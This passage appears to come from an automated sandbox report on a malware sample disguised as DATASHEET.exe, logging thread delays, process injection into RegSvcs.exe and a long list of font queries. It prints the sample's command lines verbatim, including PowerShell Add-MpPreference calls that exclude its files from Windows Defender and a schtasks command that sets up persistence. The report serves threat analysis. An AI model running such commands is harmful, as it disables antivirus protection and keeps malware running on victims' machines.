                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 96050
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95922
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95688
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95575
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 95110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94985
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94860
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94735
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94610
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94485
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94360
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94235
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 94110
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 93996
                    Source: RegSvcs.exe, 0000000D.00000002.4167661155.000000000660C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll\
                    Source: RegSvcs.exe, 00000008.00000002.1811403334.00000000063F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe"
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe"
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe"Jump to behavior
                    Allocates memory in foreign processes
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: EB8008Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 43E000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 440000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1087008Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DATASHEET.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp8AFA.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jwvzGqkYNEejno" /XML "C:\Users\user\AppData\Local\Temp\tmp9C6E.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\jwvzGqkYNEejno.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Users\user\Desktop\DATASHEET.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\DATASHEET.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
